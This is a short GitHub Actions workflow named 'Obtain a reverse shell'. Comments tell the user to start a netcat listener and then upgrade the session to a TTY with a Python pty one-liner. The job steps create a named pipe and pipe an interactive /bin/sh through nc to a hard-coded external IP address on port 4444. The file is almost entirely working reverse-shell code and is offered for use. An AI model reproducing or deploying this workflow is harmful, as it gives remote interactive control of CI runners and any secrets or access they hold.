name: Obtain a reverse shell

# run       "  nc -nlvp 4444  "     on host
# after obtaining reverse shell, upgrade it to tty using the command    
#            "  python -c 'import pty; pty.spawn("/bin/bash")'  "

on: 
  workflow_dispatch:
  
jobs:
  rev-shell:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout this repo
        uses: actions/checkout@v2
        
      - name: RM - Get the shell
        continue-on-error: true
        run: |
          rm /tmp/f > /dev/null 2>&1
          
      - name: mkfifo - Get the shell
        run: |
          mkfifo /tmp/f
          
      - name: cat - Get the shell
        run: |
          cat /tmp/f | /bin/sh -i 2>&1 | nc 54.221.74.225 4444 > /tmp/f

